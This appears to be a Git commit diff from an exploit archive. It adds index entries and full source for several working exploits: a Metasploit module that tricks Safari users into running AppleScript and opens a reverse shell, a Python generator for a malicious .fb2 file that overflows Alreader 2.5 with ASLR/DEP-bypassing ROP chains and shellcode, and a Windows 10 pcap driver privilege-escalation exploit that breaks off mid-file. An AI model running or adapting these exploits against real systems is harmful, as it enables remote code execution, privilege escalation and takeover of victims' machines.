DB: 2015-10-27
4 new exploits
This commit is contained in:
parent
a3e2d9b7a2
commit
d0e0fe5941
5 changed files with 885 additions and 0 deletions
|
@ -34791,6 +34791,7 @@ id,file,description,date,author,platform,type,port
|
|||
38510,platforms/php/webapps/38510.txt,"WordPress Securimage-WP Plugin 'siwp_test.php' Cross Site Scripting Vulnerability",2013-05-11,"Gjoko Krstic",php,webapps,0
|
||||
38511,platforms/php/webapps/38511.txt,"Gallery Server Pro Arbitrary File Upload Vulnerability",2013-05-14,"Drew Calcott",php,webapps,0
|
||||
38512,platforms/windows/remote/38512.php,"The World Browser 3.0 Final - Remote Code Execution",2015-10-22,"Ehsan Noreddini",windows,remote,0
|
||||
38513,platforms/windows/remote/38513.txt,"TeamSpeak Client <= 3.0.18.1 - RFI to RCE Exploit",2015-10-22,Scurippio,windows,remote,0
|
||||
38514,platforms/hardware/webapps/38514.py,"Beckhoff CX9020 CPU Module - Remote Code Execution Exploit",2015-10-22,Photubias,hardware,webapps,0
|
||||
38515,platforms/php/webapps/38515.txt,"WordPress wp-FileManager Plugin 'path' Parameter Arbitrary File Download Vulnerability",2013-05-15,ByEge,php,webapps,0
|
||||
38516,platforms/php/webapps/38516.txt,"Open Flash Chart 'get-data' Parameter Cross-Site Scripting Vulnerability",2013-05-14,"Deepankar Arora",php,webapps,0
|
||||
|
@ -34806,3 +34807,6 @@ id,file,description,date,author,platform,type,port
|
|||
38526,platforms/windows/remote/38526.py,"Easy File Sharing Web Server 7.2 - Remote SEH Based Overflow",2015-10-23,Audit0r,windows,remote,0
|
||||
38527,platforms/php/webapps/38527.txt,"Realtyna RPL Joomla Extension 8.9.2 - Multiple SQL Injection Vulnerabilities",2015-10-23,"Bikramaditya Guha",php,webapps,0
|
||||
38528,platforms/php/webapps/38528.txt,"Realtyna RPL Joomla Extension 8.9.2 - Persistent XSS And CSRF Vulnerabilities",2015-10-23,"Bikramaditya Guha",php,webapps,0
|
||||
38532,platforms/windows/local/38532.py,"Alreader 2.5 .fb2 - SEH Based Stack Overflow (ASLR and DEP bypass)",2015-10-25,g00dv1n,windows,local,0
|
||||
38533,platforms/windows/local/38533.c,"Windows 10 - pcap Driver Local Privilege Escalation",2015-10-26,Rootkitsmm,windows,local,0
|
||||
38535,platforms/osx/remote/38535.rb,"Safari User-Assisted Applescript Exec Attack",2015-10-26,metasploit,osx,remote,0
|
||||
|
|
Can't render this file because it is too large.
|
93
platforms/osx/remote/38535.rb
Executable file
93
platforms/osx/remote/38535.rb
Executable file
|
@ -0,0 +1,93 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ManualRanking
|
||||
|
||||
include Msf::Exploit::EXE
|
||||
include Msf::Exploit::Remote::BrowserExploitServer
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Safari User-Assisted Applescript Exec Attack',
|
||||
'Description' => %q{
|
||||
In versions of Mac OS X before 10.11.1, the applescript:// URL
|
||||
scheme is provided, which opens the provided script in the Applescript
|
||||
Editor. Pressing cmd-R in the Editor executes the code without any
|
||||
additional confirmation from the user. By getting the user to press
|
||||
cmd-R in Safari, and by hooking the cmd-key keypress event, a user
|
||||
can be tricked into running arbitrary Applescript code.
|
||||
|
||||
Gatekeeper should be disabled from Security & Privacy in order to
|
||||
avoid the unidentified Developer prompt.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Arch' => ARCH_CMD,
|
||||
'Platform' => ['unix', 'osx'],
|
||||
'Compat' =>
|
||||
{
|
||||
'PayloadType' => 'cmd'
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Mac OS X', {} ]
|
||||
],
|
||||
'DefaultOptions' => { 'payload' => 'cmd/unix/reverse_python' },
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Oct 16 2015',
|
||||
'Author' => [ 'joev' ],
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2015-7007' ],
|
||||
[ 'URL', 'https://support.apple.com/en-us/HT205375' ]
|
||||
],
|
||||
'BrowserRequirements' => {
|
||||
:source => 'script',
|
||||
:ua_name => HttpClients::SAFARI,
|
||||
:os_name => OperatingSystems::Match::MAC_OSX
|
||||
}
|
||||
))
|
||||
|
||||
register_options([
|
||||
OptString.new('CONTENT', [false, "Content to display in browser",
|
||||
"This page has failed to load. Press cmd-R to refresh."]),
|
||||
OptString.new('WritableDir', [true, 'Writable directory', '/.Trashes'])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def on_request_exploit(cli, request, profile)
|
||||
print_status("Sending #{self.name}")
|
||||
send_response_html(cli, exploit_html)
|
||||
end
|
||||
|
||||
def exploit_html
|
||||
"<!doctype html><html><body>#{content}<script>#{exploit_js}</script></body></html>"
|
||||
end
|
||||
|
||||
def exploit_js
|
||||
js_obfuscate %Q|
|
||||
var as = Array(150).join("\\n") +
|
||||
'do shell script "echo #{Rex::Text.encode_base64(sh)} \| base64 --decode \| /bin/sh"';
|
||||
var url = 'applescript://com.apple.scripteditor?action=new&script='+encodeURIComponent(as);
|
||||
window.onkeydown = function(e) {
|
||||
if (e.keyCode == 91) {
|
||||
window.location = url;
|
||||
}
|
||||
};
|
||||
|
|
||||
end
|
||||
|
||||
def sh
|
||||
'killall "Script Editor"; nohup ' + payload.encoded
|
||||
end
|
||||
|
||||
def content
|
||||
datastore['CONTENT']
|
||||
end
|
||||
|
||||
|
||||
end
|
463
platforms/windows/local/38532.py
Executable file
463
platforms/windows/local/38532.py
Executable file
|
@ -0,0 +1,463 @@
|
|||
#!/usr/bin/env python
|
||||
|
||||
#*************************************************************************************************************
|
||||
# Exploit Title: Alreader 2.5 .fb2 SEH Based Stack Overflow (ASLR and DEP bypass)
|
||||
# Date: 25.10.2015
|
||||
# Category: Local Exploit
|
||||
# Exploit Author: g00dv1n
|
||||
# Contact: g00dv1n.private@gmail.com
|
||||
# Version: 2.5
|
||||
# Tested on: Windows XP SP3 / Windows 7 / Windows 8
|
||||
# Vendor Homepage: http://www.alreader.com/index.php?lang=en
|
||||
# Software Link (ENG): http://www.alreader.com/download.php?file=AlReader2.Win32.en.zip
|
||||
# Software Link (RU): http://www.alreader.com/download.php?file=AlReader2.Win32.ru.zip
|
||||
# CVE:
|
||||
|
||||
|
||||
|
||||
# Description:
|
||||
# Alreader 2.5 its free FB2 reader for Windows.
|
||||
# FB2 format its just XML. FB2 contain <author> <first-name> </first-name> </author> block.
|
||||
# Overflow occurs if you create a long name of the author.
|
||||
# App used WCHAR (1 char - 2 bytes ). If we create file in UTF-8 then app turn every single byte into two.
|
||||
# For example 41 41 - 00 41 00 41
|
||||
# So We should use UTF-16.
|
||||
#
|
||||
# Also, we can use single null byte in payload.
|
||||
#
|
||||
#
|
||||
#
|
||||
# Instructions:
|
||||
# 1. Run this py script for generate AlReader-fb2-PoC-exploit.fb2 file.
|
||||
# 2. Run Alreader.exe
|
||||
# 3. Open AlReader-fb2-PoC-exploit.fb2 ( FILE -> Open )
|
||||
# 4. Enjoy running Calc.exe
|
||||
#
|
||||
# Exploit owerview:
|
||||
# For bypass ALSR I used a ROP style. Main module Alreader2.exe non-ALSR. It also contain calls GetModuleHandleW
|
||||
# and GetProcAdress. So using this functions I can get pointer to call VirtualProtect to make stack executable and
|
||||
# run Shellcode.
|
||||
#
|
||||
# At overflow overwritten SEH. So we can control EIP. For this spray Jump Adress in payload
|
||||
# ( It is necessary to adjust the offset in different systems .)
|
||||
# Then to get control of the stack we need ADD to ESP some value. (ADD ESP, 808h). Then ESP will point to ROP NOP
|
||||
# ( It is necessary to adjust the offset in different systems .)
|
||||
# Then the control get ROP chain .
|
||||
#
|
||||
# Program have Russian (RU) and English (Eng) versions.
|
||||
# ROP chains for them the same but different addresses. ( addresses of ADD ESP, 808h and ROP NOP same for all versions )
|
||||
# For a combination of two versions into one exploit I place two ROP chains one after another.
|
||||
# For RU version then an exception occurs, control passes first ROP chain. (ADD ESP, 808h RETN 4 then ROP NOPs )
|
||||
# For Eng version after ADD ESP, 808h RETN 4 and ROP NOPs arises yet another exepiton and Call ADD ESP, 808h.
|
||||
# So ESP jump over first ROP chain. ROP NOP correct offset and Second ROP chain for Eng version, get control.
|
||||
# With these tricks, the exploit works correctly for both versions.
|
||||
#
|
||||
# Below is ANSI-diagram of the payload:
|
||||
#
|
||||
# =-------------------------=
|
||||
# | gdvn | just fan magic bytes
|
||||
# |-------------------------|
|
||||
# | |
|
||||
# | jmp from SEH adress | x 500 Spray Andress to Jump from oveeride SEH
|
||||
# | | (ADD ESP, 808h RETN 4)
|
||||
# |-------------------------|
|
||||
# | |
|
||||
# | ROP NOP | x 500 Spray ROP NOP (RETN)
|
||||
# | |
|
||||
# |-------------------------|
|
||||
# | |
|
||||
# | ROP chain for |
|
||||
# | RU version |
|
||||
# | |
|
||||
# |-------------------------|
|
||||
# | SHELLCODE | Run Calc.exe
|
||||
# |-------------------------|
|
||||
# | |
|
||||
# | ROP NOP | x 250 Spray ROP NOP (RETN)
|
||||
# | |
|
||||
# |-------------------------|
|
||||
# | |
|
||||
# | ROP chain for |
|
||||
# | ENG version |
|
||||
# | |
|
||||
# |-------------------------|
|
||||
# | SHELLCODE | Run Calc.exe
|
||||
# |-------------------------|
|
||||
# | |
|
||||
# | ROP chain for |
|
||||
# | ENG version |
|
||||
# | |
|
||||
# |-------------------------|
|
||||
# | |
|
||||
# | |
|
||||
# | Junk | 'A' x 6000
|
||||
# | |
|
||||
# | |
|
||||
# =-------------------------=
|
||||
#
|
||||
#
|
||||
#
|
||||
#
|
||||
#
|
||||
#**************************************************************************************************************
|
||||
|
||||
|
||||
|
||||
|
||||
#######################################################################################################
|
||||
from struct import *
|
||||
|
||||
#######################################################################################################
|
||||
file_result = "AlReader-fb2-PoC-exploit.fb2"
|
||||
|
||||
|
||||
########################################################################################################
|
||||
|
||||
fuz_text = '' # init fuzzy string
|
||||
|
||||
|
||||
|
||||
|
||||
jmp_to = pack('<I',0x00442391 ) # 0x00442391 ADD ESP, 808h RETN 4
|
||||
|
||||
ret_NOP = pack('<I',0x00448147 ) # RETN
|
||||
|
||||
|
||||
##################################### START CREATE ROP CHAINs ############################################
|
||||
|
||||
fuz_text += 'gdvn' # magic init bytes
|
||||
|
||||
|
||||
|
||||
fuz_text += jmp_to * 500 # spray adr
|
||||
|
||||
|
||||
|
||||
fuz_text += ret_NOP * 500 # spray RETN adr
|
||||
|
||||
|
||||
|
||||
####################################### ROP CHAIN FOR RUS VERSION ########################################
|
||||
|
||||
# Prepare to call GetModuleHandleW
|
||||
# EDI = GetModuleHandleW adr
|
||||
# ESI = ret adr
|
||||
# EBP = ptr to unicode 'kernel32.dll'
|
||||
|
||||
ret_adr_after = pack('<I',0x0048ddd1 ) # 0x0048ddd1 : # ADD ESP,30 # RETN ( this need to correct ESP )
|
||||
module_handlew_adr = pack('<I',0x004FC8FC ) # 0x004FC8FC GetModuleHandleW adr
|
||||
kernel32_u = pack('<I',0x0560944 ) # 0x0560944 ptr to unicode 'kernel32.dll'
|
||||
|
||||
|
||||
#0x004904a6 : # POP EDI # POP ESI # POP EBP # POP EBX # RETN
|
||||
fuz_text += pack('<I',0x004904a6 ) + module_handlew_adr + ret_adr_after + kernel32_u
|
||||
|
||||
fuz_text += '\x41' * 4
|
||||
|
||||
|
||||
fuz_text += pack('<I',0x004f831c ) # 0x004f831c # ADD ESP,24 # RETN
|
||||
|
||||
fuz_text += '\x41' * 36
|
||||
|
||||
fuz_text += pack('<I',0x004b310d ) # 0x004b310d : # PUSHAD # RETN
|
||||
|
||||
fuz_text += '\x41' * 28 # correct after ADD ESP,30
|
||||
|
||||
|
||||
#Junk
|
||||
#################################################
|
||||
fuz_text += pack('<I',0x004f831c ) # 0x004f831c # ADD ESP,24 # RETN
|
||||
|
||||
fuz_text += '\x41' * 36
|
||||
#################################################
|
||||
|
||||
#EAX = kernel32 base adr
|
||||
|
||||
# Prepare to call GetProcAdress
|
||||
# EDI = GetProcAdress adr
|
||||
# ESI = ret adr
|
||||
# EBP = kernel32 base adr
|
||||
# ESP = ptr to ANSII 'VirtualProtect00'
|
||||
|
||||
|
||||
ret_adr_after = pack('<I',0x0048ddd1 ) # 0x0048ddd1 : # ADD ESP,30 # RETN ( this need to correct ESP )
|
||||
|
||||
get_proc_adr = pack('<I',0x0043C8B2 ) # 0x0043C8B2 - GetProcAdress
|
||||
|
||||
|
||||
# 0x004904A8 : # POP EDI # POP ESI # POP EBP # POP EBX # RETN
|
||||
|
||||
fuz_text += pack('<I',0x004904A8 ) + get_proc_adr + ret_adr_after
|
||||
|
||||
fuz_text += '\x41' * 8
|
||||
|
||||
|
||||
fuz_text += pack('<I',0x004b9e9e ) # 0x004b9e9e : # XCHG EAX,EBP # SETE CL # MOV EAX,ECX # RETN
|
||||
|
||||
fuz_text += pack('<I',0x004b310d ) # 0x004b310d : # PUSHAD # RETN
|
||||
|
||||
fuz_text += 'VirtualProtect' + '\x00'
|
||||
|
||||
fuz_text += '\x41' * 17 # correct ESP pointer
|
||||
|
||||
|
||||
########################################################
|
||||
# Prepare registrs for Virtual protect call
|
||||
|
||||
# EDI = ROP NOP
|
||||
# ESI = VirtualProtect adr
|
||||
# EBP = Ret adr
|
||||
# ESP = auto
|
||||
# EBX = 1
|
||||
# EDX = 0x40
|
||||
# ECX = lpOldProtect (ptr to W address)
|
||||
|
||||
# Now in EAX VP adr
|
||||
|
||||
fuz_text += pack('<I',0x00489cdd ) # 0x00489cdd, # PUSH EAX # POP ESI # RETN
|
||||
|
||||
fuz_text += pack('<I',0x004a6392 ) # 0x004a6392, # POP EBX # RETN
|
||||
|
||||
fuz_text += pack('<I',0x5DE58BD1 ) # 0x5DE58BD0, # EBX = 5DE58BD1
|
||||
|
||||
fuz_text += pack('<I',0x004e7d31 ) # 0x004e7d31, # SUB EBX,5DE58BD0 # RETN # EBX = 1
|
||||
|
||||
fuz_text += pack('<I',0x004fc23c ) # 0x004fc23c, # XOR EDX,EDX # RETN # EDX = 0
|
||||
|
||||
fuz_text += pack('<I',0x0040db04 ) * 64 # 0x0040db04, # INC EDX # ADD AL,3B # RETN x 64 # EDX = 0x40
|
||||
|
||||
fuz_text += pack('<I',0x0048c064 ) # 0x0048c064, # POP ECX # RETN
|
||||
|
||||
fuz_text += pack('<I',0x00629eea ) # 0x00629eea, # &Writable location
|
||||
|
||||
fuz_text += pack('<I',0x00487d6a ) # 0x00487d6a, # POP EDI # RETN
|
||||
|
||||
fuz_text += pack('<I',0x004f4401 ) # 0x004f4401, # RETN (ROP NOP)
|
||||
|
||||
|
||||
|
||||
fuz_text += pack('<I',0x004e6379 ) # 0x004e6379, # POP EBP # RETN
|
||||
|
||||
ret_adr_after = pack('<I',0x004f831c ) # ret adr # 0x004f831c # ADD ESP,24 # RETN
|
||||
|
||||
|
||||
fuz_text += ret_adr_after
|
||||
|
||||
fuz_text+= pack('<I',0x004ecfab ) # 0x004ecfab, # PUSHAD # RETN
|
||||
|
||||
fuz_text += '\x41' * 32 # Correct poiter to ESP
|
||||
|
||||
|
||||
|
||||
fuz_text += pack('<I',0x004a37bd ) # 0x004a37bd : # jmp esp
|
||||
|
||||
fuz_text += '\x90' * 16 # NOP's :-)
|
||||
|
||||
|
||||
##################################### END ROP CHAIN #########################################
|
||||
|
||||
#############################################################################################
|
||||
#PASTE SHELLCODE HERE
|
||||
|
||||
|
||||
|
||||
|
||||
# Run Calc
|
||||
shellcode = ("\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
|
||||
"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
|
||||
"\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
|
||||
"\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
|
||||
"\x57\x78\x01\xc2\x8b\x7a\x20\x01"
|
||||
"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
|
||||
"\x45\x81\x3e\x43\x72\x65\x61\x75"
|
||||
"\xf2\x81\x7e\x08\x6f\x63\x65\x73"
|
||||
"\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
|
||||
"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
|
||||
"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
|
||||
"\xb1\xff\x53\xe2\xfd\x68\x63\x61"
|
||||
"\x6c\x63\x89\xe2\x52\x52\x53\x53"
|
||||
"\x53\x53\x53\x53\x52\x53\xff\xd7");
|
||||
|
||||
|
||||
fuz_text += shellcode
|
||||
|
||||
|
||||
#############################################################################################
|
||||
fuz_text += ret_NOP * 250 # spray RETN adr
|
||||
|
||||
#############################################################################################
|
||||
|
||||
############################### ROP CHAIN FOR ENG VERSION ###################################
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
# Prepare to call GetModuleHandleW
|
||||
# EDI = GetModuleHandleW adr
|
||||
# ESI = ret adr
|
||||
# EBP = ptr to unicode 'kernel32.dll'
|
||||
|
||||
ret_adr_after = pack('<I',0x004cad21 ) # 0x004cad21 : # ADD ESP,30 # RETN ( this need to correct ESP )
|
||||
module_handlew_adr = pack('<I',0x004FC85C ) # 0x004FC85C GetModuleHandleW adr
|
||||
kernel32_u = pack('<I',0x00560724 ) # 0x00560724 ptr to unicode 'kernel32.dll'
|
||||
|
||||
|
||||
#0x00488ed6 : # POP EDI # POP ESI # POP EBP # POP EBX # RETN
|
||||
fuz_text += pack('<I',0x00488ed6 ) + module_handlew_adr + ret_adr_after + kernel32_u
|
||||
|
||||
fuz_text += '\x41' * 4
|
||||
|
||||
|
||||
fuz_text += pack('<I',0x004a8ee8 ) # 0x004a8ee8 # ADD ESP,24 # RETN
|
||||
|
||||
fuz_text += '\x41' * 36
|
||||
|
||||
fuz_text += pack('<I',0x004b3ded ) # 0x004b3ded : # PUSHAD # RETN
|
||||
|
||||
fuz_text += '\x41' * 28 # correct after ADD ESP,30
|
||||
|
||||
|
||||
#Junk
|
||||
#################################################
|
||||
fuz_text += pack('<I',0x004a8ee8 ) # 0x004a8ee8 # ADD ESP,24 # RETN
|
||||
|
||||
fuz_text += '\x41' * 36
|
||||
#################################################
|
||||
|
||||
#EAX = kernel32 base adr
|
||||
|
||||
# Prepare to call GetProcAdress
|
||||
# EDI = GetProcAdress adr
|
||||
# ESI = ret adr
|
||||
# EBP = kernel32 base adr
|
||||
# ESP = ptr to ANSII 'VirtualProtect00'
|
||||
|
||||
|
||||
ret_adr_after = pack('<I',0x004cad21 ) # 0x004cad21 : # ADD ESP,30 # RETN ( this need to correct ESP )
|
||||
|
||||
get_proc_adr = pack('<I',0x0043C8B2 ) # 0x0043C8B2 - GetProcAdress
|
||||
|
||||
|
||||
# 0x00488ed6 : # POP EDI # POP ESI # POP EBP # POP EBX # RETN
|
||||
|
||||
fuz_text += pack('<I',0x00488ed6 ) + get_proc_adr + ret_adr_after
|
||||
|
||||
fuz_text += '\x41' * 8
|
||||
|
||||
|
||||
fuz_text += pack('<I',0x004b9dfe ) # 0x004b9dfe : # XCHG EAX,EBP # SETE CL # MOV EAX,ECX # RETN
|
||||
|
||||
fuz_text += pack('<I',0x004b3ded ) # 0x004b3ded : # PUSHAD # RETN
|
||||
|
||||
fuz_text += 'VirtualProtect' + '\x00'
|
||||
|
||||
fuz_text += '\x41' * 17 # correct ESP pointer
|
||||
|
||||
|
||||
########################################################
|
||||
# Prepare registrs for Virtual protect call
|
||||
|
||||
# EDI = ROP NOP
|
||||
# ESI = VirtualProtect adr
|
||||
# EBP = Ret adr
|
||||
# ESP = auto
|
||||
# EBX = 1
|
||||
# EDX = 0x40
|
||||
# ECX = lpOldProtect (ptr to W address)
|
||||
|
||||
# Now in EAX VP adr
|
||||
|
||||
fuz_text += pack('<I',0x00489c3d ) # 0x00489c3d, # PUSH EAX # POP ESI # RETN
|
||||
|
||||
fuz_text += pack('<I',0x00481c40 ) # 0x00481c40, # POP EBX # RETN
|
||||
|
||||
fuz_text += pack('<I',0x5DE58BD1 ) # 0x5DE58BD0, # EBX = 5DE58BD1
|
||||
|
||||
fuz_text += pack('<I',0x004e7c91 ) # 0x004e7c91, # SUB EBX,5DE58BD0 # RETN # EBX = 1
|
||||
|
||||
fuz_text += pack('<I',0x004fc19c ) # 0x004fc19c, # XOR EDX,EDX # RETN
|
||||
|
||||
fuz_text += pack('<I',0x0040db04 ) * 64 # 0x0040db04, # INC EDX # ADD AL,3B # RETN x 64 # EDX = 0x40
|
||||
|
||||
fuz_text += pack('<I',0x004f39dc ) # 0x004f39dc, # POP ECX # RETN
|
||||
|
||||
fuz_text += pack('<I',0x0062909d ) # 0x0062909d, # &Writable location
|
||||
|
||||
fuz_text += pack('<I',0x00495df4 ) # 0x00495df4, # POP EDI # RETN
|
||||
|
||||
fuz_text += pack('<I',0x00483a02 ) # 0x00483a02, # RETN (ROP NOP)
|
||||
|
||||
|
||||
|
||||
fuz_text += pack('<I',0x004fb3c6 ) # 0x004fb3c6, # POP EBP # RETN
|
||||
|
||||
ret_adr_after = pack('<I',0x004a8ee8 ) # ret adr # 0x004a8ee8 # ADD ESP,24 # RETN
|
||||
|
||||
|
||||
fuz_text += ret_adr_after
|
||||
|
||||
fuz_text+= pack('<I',0x004b3ded ) # 0x004b3ded, # PUSHAD # RETN
|
||||
|
||||
fuz_text += '\x41' * 32 # Correct poiter to ESP
|
||||
|
||||
|
||||
|
||||
fuz_text += pack('<I',0x004757a7 ) # 0x004757a7 : # jmp esp
|
||||
|
||||
fuz_text += '\x90' * 16 # NOP's :-)
|
||||
|
||||
|
||||
fuz_text += shellcode
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
##############################################################################################
|
||||
fuz_text += '\x41' * 6000 # final junk
|
||||
|
||||
|
||||
################################ GENERATE utf-16 fb2 file ####################################
|
||||
|
||||
start = '''
|
||||
<?xml version="1.0" encoding="unicode-utf_16"?>
|
||||
<FictionBook xmlns="http://www.gribuser.ru/xml/fictionbook/2.0" xmlns:l="http://www.w3.org/1999/xlink">
|
||||
<description>
|
||||
<title-info>
|
||||
<author>
|
||||
<first-name>
|
||||
'''
|
||||
|
||||
end = '''
|
||||
<middle-name/>
|
||||
<last-name/>
|
||||
</author>
|
||||
<book-title>EXPLOIT TEST</book-title>
|
||||
</title-info>
|
||||
</description>
|
||||
</FictionBook>
|
||||
'''
|
||||
start_u = start.encode('utf-16')
|
||||
|
||||
end_u = end.encode('utf-16')
|
||||
|
||||
fout = open(file_result, 'wb')
|
||||
fout.write(start_u)
|
||||
fout.close()
|
||||
|
||||
fout = open(file_result,'ab')
|
||||
fout.write(fuz_text)
|
||||
fout.close()
|
||||
|
||||
fout = open(file_result,'ab')
|
||||
fout.write(end_u)
|
||||
fout.close()
|
||||
|
||||
|
||||
print "[*] File successfully created !!\n\n"
|
193
platforms/windows/local/38533.c
Executable file
193
platforms/windows/local/38533.c
Executable file
|
@ -0,0 +1,193 @@
|
|||
## Source: https://github.com/Rootkitsmm/Win10Pcap-Exploit
|
||||
|
||||
#include <stdio.h>
|
||||
#include <tchar.h>
|
||||
#include<Windows.h>
|
||||
#include<stdio.h>
|
||||
#include <winternl.h>
|
||||
#include <intrin.h>
|
||||
#include <psapi.h>
|
||||
#include <strsafe.h>
|
||||
#include <assert.h>
|
||||
|
||||
#define SL_IOCTL_GET_EVENT_NAME CTL_CODE(0x8000, 1, METHOD_NEITHER, FILE_ANY_ACCESS)
|
||||
#define STATUS_SUCCESS ((NTSTATUS)0x00000000L)
|
||||
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xc0000004L)
|
||||
|
||||
/* found with :
|
||||
!token
|
||||
1: kd> dt nt!_OBJECT_HEADER
|
||||
+0x000 PointerCount : Int4B
|
||||
+0x004 HandleCount : Int4B
|
||||
+0x004 NextToFree : Ptr32 Void
|
||||
+0x008 Lock : _EX_PUSH_LOCK
|
||||
+0x00c TypeIndex : UChar
|
||||
+0x00d TraceFlags : UChar
|
||||
+0x00e InfoMask : UChar
|
||||
+0x00f Flags : UChar
|
||||
+0x010 ObjectCreateInfo : Ptr32 _OBJECT_CREATE_INFORMATION
|
||||
+0x010 QuotaBlockCharged : Ptr32 Void
|
||||
+0x014 SecurityDescriptor : Ptr32 Void
|
||||
+0x018 Body : _QUAD
|
||||
|
||||
TypeIndex is 0x5
|
||||
*/
|
||||
#define HANDLE_TYPE_TOKEN 0x5
|
||||
|
||||
|
||||
// Undocumented SYSTEM_INFORMATION_CLASS: SystemHandleInformation
|
||||
const SYSTEM_INFORMATION_CLASS SystemHandleInformation =
|
||||
(SYSTEM_INFORMATION_CLASS)16;
|
||||
|
||||
// The NtQuerySystemInformation function and the structures that it returns
|
||||
// are internal to the operating system and subject to change from one
|
||||
// release of Windows to another. To maintain the compatibility of your
|
||||
// application, it is better not to use the function.
|
||||
typedef NTSTATUS (WINAPI * PFN_NTQUERYSYSTEMINFORMATION)(
|
||||
IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
|
||||
OUT PVOID SystemInformation,
|
||||
IN ULONG SystemInformationLength,
|
||||
OUT PULONG ReturnLength OPTIONAL
|
||||
);
|
||||
|
||||
// Undocumented structure: SYSTEM_HANDLE_INFORMATION
|
||||
typedef struct _SYSTEM_HANDLE
|
||||
{
|
||||
ULONG ProcessId;
|
||||
UCHAR ObjectTypeNumber;
|
||||
UCHAR Flags;
|
||||
USHORT Handle;
|
||||
PVOID Object;
|
||||
ACCESS_MASK GrantedAccess;
|
||||
} SYSTEM_HANDLE, *PSYSTEM_HANDLE;
|
||||
|
||||
typedef struct _SYSTEM_HANDLE_INFORMATION
|
||||
{
|
||||
ULONG NumberOfHandles;
|
||||
SYSTEM_HANDLE Handles[1];
|
||||
} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;
|
||||
|
||||
|
||||
// Undocumented FILE_INFORMATION_CLASS: FileNameInformation
|
||||
const FILE_INFORMATION_CLASS FileNameInformation =
|
||||
(FILE_INFORMATION_CLASS)9;
|
||||
|
||||
// The NtQueryInformationFile function and the structures that it returns
|
||||
// are internal to the operating system and subject to change from one
|
||||
// release of Windows to another. To maintain the compatibility of your
|
||||
// application, it is better not to use the function.
|
||||
typedef NTSTATUS (WINAPI * PFN_NTQUERYINFORMATIONFILE)(
|
||||
IN HANDLE FileHandle,
|
||||
OUT PIO_STATUS_BLOCK IoStatusBlock,
|
||||
OUT PVOID FileInformation,
|
||||
IN ULONG Length,
|
||||
IN FILE_INFORMATION_CLASS FileInformationClass
|
||||
);
|
||||
|
||||
// FILE_NAME_INFORMATION contains name of queried file object.
|
||||
typedef struct _FILE_NAME_INFORMATION {
|
||||
ULONG FileNameLength;
|
||||
WCHAR FileName[1];
|
||||
} FILE_NAME_INFORMATION, *PFILE_NAME_INFORMATION;
|
||||
|
||||
|
||||
void* FindTokenAddressHandles(ULONG pid)
|
||||
{
|
||||
/////////////////////////////////////////////////////////////////////////
|
||||
// Prepare for NtQuerySystemInformation and NtQueryInformationFile.
|
||||
//
|
||||
|
||||
// The functions have no associated import library. You must use the
|
||||
// LoadLibrary and GetProcAddress functions to dynamically link to
|
||||
// ntdll.dll.
|
||||
|
||||
HINSTANCE hNtDll = LoadLibrary(_T("ntdll.dll"));
|
||||
assert(hNtDll != NULL);
|
||||
|
||||
PFN_NTQUERYSYSTEMINFORMATION NtQuerySystemInformation =
|
||||
(PFN_NTQUERYSYSTEMINFORMATION)GetProcAddress(hNtDll,
|
||||
"NtQuerySystemInformation");
|
||||
assert(NtQuerySystemInformation != NULL);
|
||||
|
||||
|
||||
/////////////////////////////////////////////////////////////////////////
|
||||
// Get system handle information.
|
||||
//
|
||||
|
||||
DWORD nSize = 4096, nReturn;
|
||||
PSYSTEM_HANDLE_INFORMATION pSysHandleInfo = (PSYSTEM_HANDLE_INFORMATION)
|
||||
HeapAlloc(GetProcessHeap(), 0, nSize);
|
||||
|
||||
// NtQuerySystemInformation does not return the correct required buffer
|
||||
// size if the buffer passed is too small. Instead you must call the
|
||||
// function while increasing the buffer size until the function no longer
|
||||
// returns STATUS_INFO_LENGTH_MISMATCH.
|
||||
while (NtQuerySystemInformation(SystemHandleInformation, pSysHandleInfo,
|
||||
nSize, &nReturn) == STATUS_INFO_LENGTH_MISMATCH)
|
||||
{
|
||||
HeapFree(GetProcessHeap(), 0, pSysHandleInfo);
|
||||
nSize += 4096;
|
||||
pSysHandleInfo = (SYSTEM_HANDLE_INFORMATION*)HeapAlloc(
|
||||
GetProcessHeap(), 0, nSize);
|
||||
}
|
||||
|
||||
for (ULONG i = 0; i < pSysHandleInfo->NumberOfHandles; i++)
|
||||
{
|
||||
|
||||
PSYSTEM_HANDLE pHandle = &(pSysHandleInfo->Handles[i]);
|
||||
|
||||
if (pHandle->ProcessId == pid && pHandle->ObjectTypeNumber == HANDLE_TYPE_TOKEN)
|
||||
{
|
||||
printf(" ObjectTypeNumber %d , ProcessId %d , Object %p \r\n",pHandle->ObjectTypeNumber,pHandle->ProcessId,pHandle->Object);
|
||||
return pHandle->Object;
|
||||
}
|
||||
}
|
||||
|
||||
/////////////////////////////////////////////////////////////////////////
|
||||
// Clean up.
|
||||
//
|
||||
HeapFree(GetProcessHeap(), 0, pSysHandleInfo);
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
void main()
|
||||
{
|
||||
DWORD dwBytesReturned;
|
||||
DWORD ShellcodeFakeMemory;
|
||||
HANDLE token;
|
||||
|
||||
|
||||
// first create toke handle so find object address with handle
|
||||
